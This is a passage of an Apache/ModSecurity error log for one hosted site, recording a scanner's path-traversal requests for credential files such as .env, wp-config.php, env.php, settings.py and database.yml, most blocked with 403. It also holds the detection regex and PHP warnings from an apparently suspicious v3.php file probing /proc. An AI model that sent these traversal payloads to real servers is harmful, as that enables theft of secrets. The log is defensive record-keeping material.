[Tue May 12 05:25:10.524031 2026] [security2:error] [pid 1825179:tid 1825198] [client 45.148.10.238:36852] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /images../../.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/.env.production"] [unique_id "agKdltr1yOh9TvizezieggAAAEE"]
[Tue May 12 05:25:10.524101 2026] [security2:error] [pid 1825179:tid 1825198] [client 45.148.10.238:36852] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/.env.production"] [unique_id "agKdltr1yOh9TvizezieggAAAEE"]
[Tue May 12 05:25:10.524269 2026] [security2:error] [pid 1825179:tid 1825198] [client 45.148.10.238:36852] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/.env.production"] [unique_id "agKdltr1yOh9TvizezieggAAAEE"]
[Tue May 12 05:25:12.224820 2026] [security2:error] [pid 1825179:tid 1825198] [client 45.148.10.238:36852] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdltr1yOh9TvizezieggAAAEE"]
[Tue May 12 05:25:12.241398 2026] [access_compat:error] [pid 1825179:tid 1825198] [client 45.148.10.238:36852] AH01797: client denied by server configuration: /home/letamsga/public_html/wp-config.php
[Tue May 12 05:25:15.069653 2026] [security2:error] [pid 1825179:tid 1825198] [client 45.148.10.238:36852] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /images../../app/etc/env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/app/etc/env.php"] [unique_id "agKdm9r1yOh9TvizeziejgAAAEE"]
[Tue May 12 05:25:15.069872 2026] [security2:error] [pid 1825179:tid 1825198] [client 45.148.10.238:36852] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/app/etc/env.php"] [unique_id "agKdm9r1yOh9TvizeziejgAAAEE"]
[Tue May 12 05:25:16.794180 2026] [security2:error] [pid 1825179:tid 1825198] [client 45.148.10.238:36852] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdm9r1yOh9TvizeziejgAAAEE"]
[Tue May 12 05:25:16.811170 2026] [security2:error] [pid 1825179:tid 1825198] [client 45.148.10.238:36852] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /images../../settings.py"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/settings.py"] [unique_id "agKdnNr1yOh9TvizeziekAAAAEE"]
[Tue May 12 05:25:16.811372 2026] [security2:error] [pid 1825179:tid 1825198] [client 45.148.10.238:36852] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/settings.py"] [unique_id "agKdnNr1yOh9TvizeziekAAAAEE"]
[Tue May 12 05:25:18.546029 2026] [security2:error] [pid 1825179:tid 1825198] [client 45.148.10.238:36852] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdnNr1yOh9TvizeziekAAAAEE"]
[Tue May 12 05:25:18.563100 2026] [security2:error] [pid 1825179:tid 1825198] [client 45.148.10.238:36852] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /images../../config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/config/database.yml"] [unique_id "agKdntr1yOh9TvizeziekQAAAEE"]
[Tue May 12 05:25:18.563302 2026] [security2:error] [pid 1825179:tid 1825198] [client 45.148.10.238:36852] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/config/database.yml"] [unique_id "agKdntr1yOh9TvizeziekQAAAEE"]
[Tue May 12 05:25:20.274822 2026] [security2:error] [pid 1825179:tid 1825198] [client 45.148.10.238:36852] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdntr1yOh9TvizeziekQAAAEE"]
[Tue May 12 05:25:20.292024 2026] [security2:error] [pid 1825179:tid 1825198] [client 45.148.10.238:36852] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /files../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/.env"] [unique_id "agKdoNr1yOh9TvizeziekwAAAEE"]
[Tue May 12 05:25:20.292091 2026] [security2:error] [pid 1825179:tid 1825198] [client 45.148.10.238:36852] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/.env"] [unique_id "agKdoNr1yOh9TvizeziekwAAAEE"]
[Tue May 12 05:25:20.292264 2026] [security2:error] [pid 1825179:tid 1825198] [client 45.148.10.238:36852] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/.env"] [unique_id "agKdoNr1yOh9TvizeziekwAAAEE"]
[Tue May 12 05:25:22.028272 2026] [security2:error] [pid 1825179:tid 1825198] [client 45.148.10.238:36852] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdoNr1yOh9TvizeziekwAAAEE"]
[Tue May 12 05:25:22.044640 2026] [core:error] [pid 1825179:tid 1825198] [client 45.148.10.238:36852] AH10244: invalid URI path (/files../../../.env)
[Tue May 12 05:25:25.244171 2026] [core:error] [pid 1825179:tid 1825213] [client 45.148.10.238:33378] AH10244: invalid URI path (/files../../../../.env)
PHP Warning:  filesize(): stat failed for /proc/32/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/32/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/32/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/32/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/32/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/32/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 05:25:27.180509 2026] [security2:error] [pid 1842385:tid 1842413] [client 45.148.10.238:33382] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /files../../.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/.env.local"] [unique_id "agKdpxs7kySIUZ3ORnIlTQAAARY"]
[Tue May 12 05:25:27.180613 2026] [security2:error] [pid 1842385:tid 1842413] [client 45.148.10.238:33382] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/.env.local"] [unique_id "agKdpxs7kySIUZ3ORnIlTQAAARY"]
[Tue May 12 05:25:27.180793 2026] [security2:error] [pid 1842385:tid 1842413] [client 45.148.10.238:33382] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/.env.local"] [unique_id "agKdpxs7kySIUZ3ORnIlTQAAARY"]
[Tue May 12 05:25:28.922428 2026] [security2:error] [pid 1842385:tid 1842413] [client 45.148.10.238:33382] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdpxs7kySIUZ3ORnIlTQAAARY"]
[Tue May 12 05:25:28.940781 2026] [security2:error] [pid 1842385:tid 1842413] [client 45.148.10.238:33382] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /files../../.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/.env.production"] [unique_id "agKdqBs7kySIUZ3ORnIlTgAAARY"]
[Tue May 12 05:25:28.940852 2026] [security2:error] [pid 1842385:tid 1842413] [client 45.148.10.238:33382] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/.env.production"] [unique_id "agKdqBs7kySIUZ3ORnIlTgAAARY"]
[Tue May 12 05:25:28.941038 2026] [security2:error] [pid 1842385:tid 1842413] [client 45.148.10.238:33382] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/.env.production"] [unique_id "agKdqBs7kySIUZ3ORnIlTgAAARY"]
[Tue May 12 05:25:30.652136 2026] [security2:error] [pid 1842385:tid 1842413] [client 45.148.10.238:33382] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdqBs7kySIUZ3ORnIlTgAAARY"]
[Tue May 12 05:25:30.670082 2026] [access_compat:error] [pid 1842385:tid 1842413] [client 45.148.10.238:33382] AH01797: client denied by server configuration: /home/letamsga/public_html/wp-config.php
[Tue May 12 05:25:33.548548 2026] [security2:error] [pid 1842385:tid 1842413] [client 45.148.10.238:33382] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /files../../app/etc/env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/app/etc/env.php"] [unique_id "agKdrRs7kySIUZ3ORnIlUwAAARY"]
[Tue May 12 05:25:33.548780 2026] [security2:error] [pid 1842385:tid 1842413] [client 45.148.10.238:33382] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/app/etc/env.php"] [unique_id "agKdrRs7kySIUZ3ORnIlUwAAARY"]
[Tue May 12 05:25:35.490337 2026] [security2:error] [pid 1842385:tid 1842413] [client 45.148.10.238:33382] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdrRs7kySIUZ3ORnIlUwAAARY"]
[Tue May 12 05:25:35.508625 2026] [security2:error] [pid 1842385:tid 1842413] [client 45.148.10.238:33382] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /files../../settings.py"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/settings.py"] [unique_id "agKdrxs7kySIUZ3ORnIlVAAAARY"]
[Tue May 12 05:25:35.508846 2026] [security2:error] [pid 1842385:tid 1842413] [client 45.148.10.238:33382] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/settings.py"] [unique_id "agKdrxs7kySIUZ3ORnIlVAAAARY"]
[Tue May 12 05:25:37.233080 2026] [security2:error] [pid 1842385:tid 1842413] [client 45.148.10.238:33382] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdrxs7kySIUZ3ORnIlVAAAARY"]
[Tue May 12 05:25:37.251300 2026] [security2:error] [pid 1842385:tid 1842413] [client 45.148.10.238:33382] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /files../../config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/config/database.yml"] [unique_id 